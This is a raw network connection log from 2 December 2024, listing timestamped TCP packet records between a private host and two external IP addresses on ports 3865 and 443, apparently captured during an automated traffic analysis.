Dec 2, 2024 18:46:44.240313053 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:44.360610962 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:44.385317087 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:44.385422945 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:44.446794033 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:44.448229074 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:44.448246002 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:44.969316959 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:44.969367981 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:44.969718933 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:44.969778061 CET	49866	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:44.969786882 CET	443	49866	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:46.971658945 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:46.971719027 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:46.972023964 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:46.972718954 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:46.972728968 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:48.564105034 CET	49822	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:48.567167044 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:48.684108973 CET	3865	49822	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:48.687177896 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:48.687360048 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:48.703145027 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:48.823215008 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:49.453613997 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.455025911 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.455051899 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.765357018 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:49.886969090 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:49.979561090 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.979608059 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.979679108 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.980393887 CET	49875	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.980411053 CET	443	49875	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.981467009 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.981503010 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:49.981616020 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.981996059 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:49.982012033 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:50.901736021 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:51.022447109 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:51.022563934 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:51.143871069 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:51.148063898 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:51.268935919 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:51.269047022 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:51.362541914 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:51.365159035 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:51.365184069 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:51.389002085 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:51.877713919 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:51.877768040 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:51.877835035 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:51.878159046 CET	49886	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:51.878175974 CET	443	49886	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:51.895198107 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:52.080507994 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:52.080651045 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:52.200912952 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:53.893929005 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:53.893985987 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:53.894051075 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:53.894392014 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:53.894404888 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:53.986309052 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:54.107171059 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:54.727415085 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:54.847532034 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:55.322561979 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.323873997 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.323911905 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.584810972 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:55.705646992 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:55.845549107 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.845623016 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.845716953 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.864403963 CET	49892	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.864434958 CET	443	49892	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.865720034 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.865760088 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:55.865993023 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.866449118 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:55.866461992 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:58.009253979 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:58.131944895 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:58.375801086 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:58.377868891 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:58.377886057 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:58.949246883 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:58.949398041 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:58.950284958 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:59.016459942 CET	49898	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:46:59.016489029 CET	443	49898	91.134.9.160	192.168.2.4
Dec 2, 2024 18:46:59.581712008 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:59.702048063 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:46:59.702101946 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:46:59.822177887 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:00.641406059 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:00.761539936 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:00.943093061 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:01.033987045 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:01.034028053 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:01.034105062 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:01.034410000 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:01.034420967 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:01.063462973 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:02.451277971 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.454015017 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.454035044 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.974915028 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.974968910 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.975122929 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.975622892 CET	49909	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.975642920 CET	443	49909	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.976819992 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.976869106 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:02.976927042 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.977174997 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:02.977185011 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:03.720103979 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:03.840070963 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:03.974781990 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:04.095299006 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:04.095468044 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:04.215648890 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:04.409635067 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:04.410979033 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:04.411041975 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:05.404292107 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:05.404429913 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:05.404488087 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:05.404815912 CET	49915	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:05.404834032 CET	443	49915	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:05.428186893 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:05.549679995 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:06.348712921 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:06.469280005 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:06.527853012 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:06.648277998 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:06.673342943 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:06.794136047 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:07.118434906 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:07.238985062 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:07.453104019 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:07.453146935 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:07.453336000 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:07.453638077 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:07.453648090 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:08.922365904 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:08.924541950 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:08.924555063 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:09.690002918 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:09.810014963 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:10.037823915 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:10.037873030 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:10.038168907 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:10.038355112 CET	49926	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:10.038378000 CET	443	49926	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:10.039484978 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:10.039540052 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:10.039742947 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:10.040128946 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:10.040143967 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:10.206053019 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:10.333007097 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:10.650321007 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:10.650424957 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:11.465735912 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:11.467241049 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:11.467267036 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:12.460556984 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:12.460621119 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:12.460695028 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:12.461111069 CET	49932	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:12.461134911 CET	443	49932	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:14.471441031 CET	49943	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:14.471489906 CET	443	49943	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:14.471565962 CET	49943	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:14.471820116 CET	49943	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:14.471832991 CET	443	49943	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:15.626780033 CET	49880	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:15.630635977 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:15.746895075 CET	3865	49880	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:15.750762939 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:15.750838995 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:15.766638041 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:15.886776924 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:15.886825085 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:15.937448025 CET	443	49943	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:15.949013948 CET	49943	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:15.949069977 CET	443	49943	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:15.949119091 CET	49943	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:16.007081985 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:16.137504101 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:16.257483959 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:17.323884010 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:17.444433928 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:17.501782894 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:17.622911930 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:17.622972012 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:17.743048906 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:17.743088961 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:17.831238985 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:17.831286907 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:17.831353903 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:17.831701994 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:17.831720114 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:17.863394022 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:17.863440990 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:17.983597040 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:18.020365000 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:18.140326977 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:18.140374899 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:18.260801077 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:19.503631115 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:19.503715038 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:19.506597996 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:19.506614923 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:19.506871939 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:19.508424997 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:19.508466959 CET	443	49955	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:19.508557081 CET	49955	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:19.560244083 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:19.680214882 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:19.728835106 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:19.850505114 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:19.850552082 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:19.971556902 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:19.971611023 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:20.092304945 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:20.734915972 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:20.855868101 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:21.253635883 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:21.253670931 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:21.253739119 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:21.254240990 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:21.254251957 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:21.770999908 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:21.897325993 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:21.897376060 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:22.073285103 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:22.376471043 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:22.496516943 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:22.894103050 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:23.022739887 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:23.325845957 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:23.445985079 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:23.581127882 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:23.703725100 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:23.703778982 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:23.704721928 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:23.704791069 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:23.706924915 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:23.706933022 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:23.707130909 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:23.708539009 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:23.708579063 CET	443	49961	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:23.708631039 CET	49961	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:23.823904037 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:23.981952906 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:24.102272034 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:24.436383963 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:24.559185982 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:25.256823063 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:25.347388983 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:25.347429037 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:25.347489119 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:25.347904921 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:25.347918034 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:25.378232956 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:25.378293991 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:25.503251076 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:25.503318071 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:25.876600027 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:26.088222980 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:26.088283062 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:26.088335991 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:26.208760023 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:26.212197065 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:26.332281113 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:27.164385080 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:27.284476995 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:27.872648001 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:27.999602079 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:27.999666929 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:28.127331018 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:28.273972034 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:28.274182081 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:28.275760889 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:28.275769949 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:28.276021957 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:28.277338028 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:28.277375937 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:28.277484894 CET	443	49972	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:28.277508974 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:28.277556896 CET	49972	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:29.329360008 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:29.449459076 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:29.449532986 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:29.570462942 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:29.570513010 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:29.690488100 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:29.732601881 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:29.799382925 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:29.799418926 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:29.799479961 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:29.799736023 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:29.799747944 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:29.854304075 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:29.936698914 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:30.057113886 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:30.057164907 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:30.184446096 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:31.248821020 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:31.368828058 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:31.368882895 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:31.488852978 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:31.488902092 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:31.598323107 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:31.598393917 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:31.600383043 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:31.600399017 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:31.600640059 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:31.602083921 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:31.602123022 CET	443	49983	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:31.602179050 CET	49983	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:31.609211922 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:31.609261036 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:31.729214907 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:31.729268074 CET	49949	3865	192.168.2.4	147.185.221.24
Dec 2, 2024 18:47:31.849200964 CET	3865	49949	147.185.221.24	192.168.2.4
Dec 2, 2024 18:47:33.033888102 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:33.033931971 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:33.036209106 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:33.040081978 CET	49989	443	192.168.2.4	91.134.9.160
Dec 2, 2024 18:47:33.040093899 CET	443	49989	91.134.9.160	192.168.2.4
Dec 2, 2024 18:47:33.092345953 CET	49949	3865	192.168.2.4	147.185.221.24
